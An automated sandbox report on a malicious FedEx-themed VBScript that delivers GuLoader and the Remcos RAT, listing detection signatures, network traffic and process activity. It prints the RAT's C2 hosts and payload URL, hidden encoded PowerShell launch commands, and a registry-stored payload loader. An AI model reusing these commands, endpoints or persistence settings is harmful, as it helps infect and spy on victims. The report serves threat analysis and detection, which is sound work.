Windows Analysis Report
775578748333_FEDEX.vbs

Overview

General Information

Sample Name: 775578748333_FEDEX.vbs
Analysis ID: 557830
MD5: 5d3ad82ef16521df753bc6baff37f72f
SHA1: ac4df3a47570b88a4768c2c461b15f78b99753dd
SHA256: 19469f11cba8ab55b84cf26efa8835e906d07fdb73572c9ee3594e5c44c798bf
Tags: RemcosRATvbs
Infos:

Detection

Remcos GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected Remcos RAT
Detected Remcos RAT
Multi AV Scanner detection for domain / URL
Yara detected GuLoader
Hides threads from debuggers
Installs a global keyboard hook
Creates an autostart registry key pointing to binary in C:\Windows
Potential evasive VBS script found (sleep loop)
Tries to detect Any.run
Wscript starts Powershell (via cmd or directly)
Potential malicious VBS script found (suspicious strings)
Potential malicious VBS script found (has network functionality)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Encrypted powershell cmdline option found
Very long command line found
Suspicious powershell command line found
Creates autostart registry keys with suspicious values (likely registry only malware)
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Found dropped PE file which has not been started or loaded
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
Drops PE files
Tries to load missing DLLs
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Sigma detected: Suspicious Csc.exe Source File Folder
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Sigma detected: Suspicious Execution of Powershell with Base64
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

AV Detection
barindex
Found malware configuration
Source: 0000000C.00000002.642638940.0000000009300000.00000040.00000001.sdmp Malware Configuration Extractor: GuLoader {"Payload URL": "https://www.wizumiya.co.jp/html/user_data/original/images/Ev"}
Source: 00000014.00000002.852416599.000000000361C000.00000004.00000020.sdmp Malware Configuration Extractor: Remcos {"Host:Port:Password": "rnnfibi.hopto.org:54666:1rnnfibiteammony.duckdns.org:54666:1", "Assigned name": "AS-NEW", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Disable", "Install path": "AppData", "Copy file": "bguy.exe", "Startup value": "iusk-dikf-iud", "Hide file": "Disable", "Mutex": "Remcos-IXYB2Q", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "notepad;solitaire;", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio path": "AppData", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": "20000"}
Multi AV Scanner detection for submitted file
Source: 775578748333_FEDEX.vbs ReversingLabs: Detection: 11%
Yara detected Remcos RAT
Source: Yara match File source: 00000014.00000002.852534659.000000000364B000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.852416599.000000000361C000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: ieinstal.exe PID: 4636, type: MEMORYSTR
Multi AV Scanner detection for domain / URL
Source: rnnfibi.hopto.org Virustotal: Detection: 5% Perma Link
Source: unknown HTTPS traffic detected: 52.68.15.223:443 -> 192.168.2.3:49756 version: TLS 1.2
Source: unknown HTTPS traffic detected: 52.68.15.223:443 -> 192.168.2.3:49758 version: TLS 1.2
Source: unknown HTTPS traffic detected: 52.68.15.223:443 -> 192.168.2.3:49759 version: TLS 1.2
Source: Binary string: ieinstal.pdbGCTL source: ieinstal.exe, 00000014.00000003.629851436.000000001EC11000.00000004.00000001.sdmp
Source: Binary string: ieinstal.pdb source: ieinstal.exe, 00000014.00000003.629851436.000000001EC11000.00000004.00000001.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Managementt.pdb| source: powershell.exe, 0000001D.00000002.888436421.0000000007768000.00000004.00000001.sdmp

Networking
barindex
Potential malicious VBS script found (has network functionality)
Source: Initial file: BinaryStream.SaveToFile arges, 2
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: rnnfibi.hopto.org
Source: Malware configuration extractor URLs: https://www.wizumiya.co.jp/html/user_data/original/images/Ev
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.3:49757 -> 199.195.253.181:54666
Source: unknown Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49756
Source: powershell.exe, 0000000C.00000002.632377605.00000000009CE000.00000004.00000020.sdmp, ieinstal.exe, 00000014.00000003.627018628.000000000364B000.00000004.00000001.sdmp, ieinstal.exe, 00000014.00000002.852534659.000000000364B000.00000004.00000020.sdmp, powershell.exe, 0000001C.00000002.866332102.00000000007BE000.00000004.00000020.sdmp, powershell.exe, 0000001D.00000002.861142279.0000000000AC9000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 0000000C.00000002.637943799.0000000005982000.00000004.00000001.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000C.00000002.634360769.0000000004A63000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.639417925.00000000075CA000.00000004.00000001.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000000C.00000002.634360769.0000000004A63000.00000004.00000001.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.pngT
Source: powershell.exe, 0000000C.00000002.633946561.0000000004921000.00000004.00000001.sdmp, powershell.exe, 00000018.00000002.873636132.0000000004921000.00000004.00000001.sdmp, powershell.exe, 0000001C.00000002.879042376.0000000004741000.00000004.00000001.sdmp, powershell.exe, 0000001D.00000002.878472669.0000000004A81000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000C.00000002.634360769.0000000004A63000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.639417925.00000000075CA000.00000004.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000000C.00000002.634360769.0000000004A63000.00000004.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlT
Source: powershell.exe, 0000000C.00000002.637943799.0000000005982000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000C.00000002.637943799.0000000005982000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000C.00000002.637943799.0000000005982000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000000C.00000002.634360769.0000000004A63000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.639417925.00000000075CA000.00000004.00000001.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000000C.00000002.634360769.0000000004A63000.00000004.00000001.sdmp String found in binary or memory: https://github.com/Pester/PesterT
Source: powershell.exe, 0000000C.00000002.637943799.0000000005982000.00000004.00000001.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: ieinstal.exe, 00000014.00000002.852346191.00000000035EF000.00000004.00000020.sdmp String found in binary or memory: https://www.wizumiya.co.jp/=-
Source: ieinstal.exe, 00000014.00000002.852416599.000000000361C000.00000004.00000020.sdmp String found in binary or memory: https://www.wizumiya.co.jp/html/user_data/original/images/Aso-new-WO-S_PAgZvxdaV59.bin
Source: ieinstal.exe, 00000014.00000002.852346191.00000000035EF000.00000004.00000020.sdmp String found in binary or memory: https://www.wizumiya.co.jp/u-
Source: unknown DNS traffic detected: queries for: www.wizumiya.co.jp
Source: global traffic HTTP traffic detected: GET /html/user_data/original/images/Aso-new-WO-S_PAgZvxdaV59.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.wizumiya.co.jpCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /html/user_data/original/images/Aso-new-WO-S_PAgZvxdaV59.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.wizumiya.co.jpCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /html/user_data/original/images/Aso-new-WO-S_PAgZvxdaV59.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.wizumiya.co.jpCache-Control: no-cache
Source: unknown HTTPS traffic detected: 52.68.15.223:443 -> 192.168.2.3:49756 version: TLS 1.2
Source: unknown HTTPS traffic detected: 52.68.15.223:443 -> 192.168.2.3:49758 version: TLS 1.2
Source: unknown HTTPS traffic detected: 52.68.15.223:443 -> 192.168.2.3:49759 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing
barindex
Installs a global keyboard hook
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Windows user hook set: 0 keyboard low level C:\Program Files (x86)\internet explorer\ieinstal.exe Jump to behavior

E-Banking Fraud
barindex
Yara detected Remcos RAT
Source: Yara match File source: 00000014.00000002.852534659.000000000364B000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.852416599.000000000361C000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: ieinstal.exe PID: 4636, type: MEMORYSTR

System Summary
barindex
Wscript starts Powershell (via cmd or directly)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBhAGcAcgB5ACAAUwBjAHIAaQB2AGUAbgAgAHMAeQBzAHQAZQBtAGsAbwAgAFQAcgBlAGQAagBlADUAIABDAGgAcgBvAG0AaQA4ACAAQgBJAEIATAAgAE8AdgBlAHIAcwB0AHIAZQA3ACAAcAByAGUAYwAgAEYAbwByAGwAaQBnAHMAaQBuADIAIABCAGUAbgBlAGYAaQB0ACAAQQBwAG8AdABoAGUAbwBzAGkAegAgAHUAZABlAHQAaQBsACAATABPAE8AUwBFACAAQgByAG4AZQB2AGUAOQAgAFQAbwBuAHMAaQAyACAAVAByAG8AcABpAHMAIABQAGwAZQB1AHIAbwBsAGkANAAgAGIAbABrAGsAIABDAHkAcwB0AGkAYwBlACAAVQBuAGQAZQByAHIAZQBwAG8AcgAxACAAUAByAG8AYwB1AGwAYwBhAHQAIABQAEEAUwBUAE8AUgAgAFMAYQBuAGcAIABjAG8AbQBiAGEAcgBvAG4AZgBvACAAbwBtAHAAcgAgAEQAYQBtAG4AZQBkADgAIABOAEUAUABIACAARgByAHUAaQB0AGkAdgBlAHIAZQAgAEQARQBGAEEASQBUAEkAUwAgAE0AaQBzAGsAZQBuAGQAZQA1ACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABTAGMAcgBpAHAAdABlAHIAZQAxAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAGkAbgB0ACAAUwBjAHIAaQBwAHQAZQByAGUANgAsAHIAZQBmACAASQBuAHQAMwAyACAAVABoAGUAbwByAGkAcwBlAHIAMgAsAGkAbgB0ACAAQQBVAFQATwBBAEMAVABJAFYARQAsAHIAZQBmACAASQBuAHQAMwAyACAAUwBjAHIAaQBwAHQAZQByAGUALABpAG4AdAAgAEwAZQBqAG4AaQA2ACwAaQBuAHQAIABTAGMAcgBpAHAAdABlAHIAZQA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBGAGkAbABlAEEAKABzAHQAcgBpAG4AZwAgAFAAcwBlAHUANAAsAHUAaQBuAHQAIABsAGkAbgBqAGUAcgAsAGkAbgB0ACAAUwBUAFIAWQAsAGkAbgB0ACAAUwBjAHIAaQBwAHQAZQByAGUAMAAsAGkAbgB0ACAAUwBFAEUAUgBOAEUALABpAG4AdAAgAFAAYQBjAGkAZgBpAGMAZQByADcALABpAG4AdAAgAEEAZAB2AGkAcwBlAG4AcwA5ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABSAGUAYQBkAEYAaQBsAGUAKABpAG4AdAAgAEEAVQBUAE8AQQBDAFQASQBWAEUAMAAsAHUAaQBuAHQAIABBAFUAVABPAEEAQwBUAEkAVgBFADEALABJAG4AdABQAHQAcgAgAEEAVQBUAE8AQQBDAFQASQBWAEUAMgAsAHIAZQBmACAASQBuAHQAMwAyACAAQQBVAFQATwBBAEMAVABJAFYARQAzACwAaQBuAHQAIABBAFUAVABPAEEAQwBUAEkAVgBFADQAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwBhAGwAbABXAGkAbgBkAG8AdwBQAHIAbwBjAFcAKABJAG4AdABQAHQAcgAgAEEAVQBUAE8AQQBDAFQASQBWAEUANQAsAGkAbgB0ACAAQQBVAFQATwBBAEMAVABJAFYARQA2ACwAaQBuAHQAIABBAFUAVABPAEEAQwBUAEkAVgBFADcALABpAG4AdAAgAEEAVQBUAE8AQQBDAFQASQBWAEUAOAAsAGkAbgB0ACAAQQBVAFQATwBBAEMAVABJAFYARQA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAHIAZQBmAHIAIABDAGEAbgBjAGUAcgBpAG4AYwBvACAATABpAG4AZwB1AGEAdAB1AGwAIABoAGUAYQBsAGUAIABMAEUAVgBJAEcAQQBUACAATABJAEcASwBJAFMAVABFACAAcwB2AG8AdgBsACAAcABsAGEAdABvAG4Aa
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden $Retrocogni8=(Get-ItemProperty -Path 'HKCU:\SOFTWARE\AppDataLow\').Rickey;powershell.exe -windowstyle hidden -encodedcommand($Retrocogni8)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden $Retrocogni8=(Get-ItemProperty -Path 'HKCU:\SOFTWARE\AppDataLow\').Rickey;powershell.exe -windowstyle hidden -encodedcommand($Retrocogni8)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBhAGcAcgB5ACAAUwBjAHIAaQB2AGUAbgAgAHMAeQBzAHQAZQBtAGsAbwAgAFQAcgBlAGQAagBlADUAIABDAGgAcgBvAG0AaQA4ACAAQgBJAEIATAAgAE8AdgBlAHIAcwB0AHIAZQA3ACAAcAByAGUAYwAgAEYAbwByAGwAaQBnAHMAaQBuADIAIABCAGUAbgBlAGYAaQB0ACAAQQBwAG8AdABoAGUAbwBzAGkAegAgAHUAZABlAHQAaQBsACAATABPAE8AUwBFACAAQgByAG4AZQB2AGUAOQAgAFQAbwBuAHMAaQAyACAAVAByAG8AcABpAHMAIABQAGwAZQB1AHIAbwBsAGkANAAgAGIAbABrAGsAIABDAHkAcwB0AGkAYwBlACAAVQBuAGQAZQByAHIAZQBwAG8AcgAxACAAUAByAG8AYwB1AGwAYwBhAHQAIABQAEEAUwBUAE8AUgAgAFMAYQBuAGcAIABjAG8AbQBiAGEAcgBvAG4AZgBvACAAbwBtAHAAcgAgAEQAYQBtAG4AZQBkADgAIABOAEUAUABIACAARgByAHUAaQB0AGkAdgBlAHIAZQAgAEQARQBGAEEASQBUAEkAUwAgAE0AaQBzAGsAZQBuAGQAZQA1ACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABTAGMAcgBpAHAAdABlAHIAZQAxAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAGkAbgB0ACAAUwBjAHIAaQBwAHQAZQByAGUANgAsAHIAZQBmACAASQBuAHQAMwAyACAAVABoAGUAbwByAGkAcwBlAHIAMgAsAGkAbgB0ACAAQQBVAFQATwBBAEMAVABJAFYARQAsAHIAZQBmACAASQBuAHQAMwAyACAAUwBjAHIAaQBwAHQAZQByAGUALABpAG4AdAAgAEwAZQBqAG4AaQA2ACwAaQBuAHQAIABTAGMAcgBpAHAAdABlAHIAZQA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBGAGkAbABlAEEAKABzAHQAcgBpAG4AZwAgAFAAcwBlAHUANAAsAHUAaQBuAHQAIABsAGkAbgBqAGUAcgAsAGkAbgB0ACAAUwBUAFIAWQAsAGkAbgB0ACAAUwBjAHIAaQBwAHQAZQByAGUAMAAsAGkAbgB0ACAAUwBFAEUAUgBOAEUALABpAG4AdAAgAFAAYQBjAGkAZgBpAGMAZQByADcALABpAG4AdAAgAEEAZAB2AGkAcwBlAG4AcwA5ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABSAGUAYQBkAEYAaQBsAGUAKABpAG4AdAAgAEEAVQBUAE8AQQBDAFQASQBWAEUAMAAsAHUAaQBuAHQAIABBAFUAVABPAEEAQwBUAEkAVgBFADEALABJAG4AdABQAHQAcgAgAEEAVQBUAE8AQQBDAFQASQBWAEUAMgAsAHIAZQBmACAASQBuAHQAMwAyACAAQQBVAFQATwBBAEMAVABJAFYARQAzACwAaQBuAHQAIABBAFUAVABPAEEAQwBUAEkAVgBFADQAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwBhAGwAbABXAGkAbgBkAG8AdwBQAHIAbwBjAFcAKABJAG4AdABQAHQAcgAgAEEAVQBUAE8AQQBDAFQASQBWAEUANQAsAGkAbgB0ACAAQQBVAFQATwBBAEMAVABJAFYARQA2ACwAaQBuAHQAIABBAFUAVABPAEEAQwBUAEkAVgBFADcALABpAG4AdAAgAEEAVQBUAE8AQQBDAFQASQBWAEUAOAAsAGkAbgB0ACAAQQBVAFQATwBBAEMAVABJAFYARQA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAHIAZQBmAHIAIABDAGEAbgBjAGUAcgBpAG4AYwBvACAATABpAG4AZwB1AGEAdAB1AGwAIABoAGUAYQBsAGUAIABMAEUAVgBJAEcAQQBUACAATABJAEcASwBJAFMAVABFACAAcwB2AG8AdgBsACAAcABsAGEAdABvAG4Aa Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden $Retrocogni8=(Get-ItemProperty -Path 'HKCU:\SOFTWARE\AppDataLow\').Rickey;powershell.exe -windowstyle hidden -encodedcommand($Retrocogni8) Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden $Retrocogni8=(Get-ItemProperty -Path 'HKCU:\SOFTWARE\AppDataLow\').Rickey;powershell.exe -windowstyle hidden -encodedcommand($Retrocogni8) Jump to behavior
Potential malicious VBS script found (suspicious strings)
Source: Initial file: obj1.ShellExecute MyFile , " -EncodedCommand " & chr(34) & max1 & chr(34),"","",0
Source: Initial file: obj1.ShellExecute "powershell.exe", " -EncodedCommand " & chr(34) & max1 & chr(34),"","",0
Very long command line found
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 7909
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: Commandline size = 7928
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: Commandline size = 7928
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 7909 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: Commandline size = 7928 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: Commandline size = 7928 Jump to behavior
Yara signature match
Source: Process Memory Space: powershell.exe PID: 7072, type: MEMORYSTR Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
Source: Process Memory Space: powershell.exe PID: 5284, type: MEMORYSTR Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
Source: Process Memory Space: powershell.exe PID: 1760, type: MEMORYSTR Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
Detected potential crypto function
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 12_2_077C1BB6 12_2_077C1BB6
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 12_2_077C8628 12_2_077C8628
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 12_2_077C6430 12_2_077C6430
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 12_2_077C1D1A 12_2_077C1D1A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 12_2_077CFB40 12_2_077CFB40
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 12_2_01256A88 12_2_01256A88
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 12_2_01256A98 12_2_01256A98
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 12_2_0125AE60 12_2_0125AE60
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 12_2_0125AE50 12_2_0125AE50
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 20_2_00EF6366 20_2_00EF6366
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 24_2_0116AD78 24_2_0116AD78
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 24_2_0116AE03 24_2_0116AE03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 24_2_06F4BC9F 24_2_06F4BC9F
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 24_2_06F442E0 24_2_06F442E0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 24_2_06F442E0 24_2_06F442E0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 24_2_06F4EB90 24_2_06F4EB90
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 24_2_075839A0 24_2_075839A0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 24_2_01167698 24_2_01167698
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 24_2_0116768A 24_2_0116768A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 28_2_074887E0 28_2_074887E0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 28_2_07480006 28_2_07480006
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 28_2_074887E0 28_2_074887E0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 28_2_07540040 28_2_07540040
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 28_2_07543A70 28_2_07543A70
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 28_2_07540006 28_2_07540006
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 28_2_07544F98 28_2_07544F98
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 28_2_07544F84 28_2_07544F84
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 29_2_0795CCB8 29_2_0795CCB8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 29_2_07962620 29_2_07962620
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 29_2_0796C530 29_2_0796C530
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 29_2_0796C540 29_2_0796C540
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 29_2_07960040 29_2_07960040
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 29_2_07A5F7E0 29_2_07A5F7E0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 29_2_07A57E00 29_2_07A57E00
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 29_2_07A57E00 29_2_07A57E00
Java / VBScript file with very long strings (likely obfuscated code)
Source: 775578748333_FEDEX.vbs Initial sample: Strings found which are bigger than 50
Tries to load missing DLLs
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: 775578748333_FEDEX.vbs ReversingLabs: Detection: 11%
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\775578748333_FEDEX.vbs"
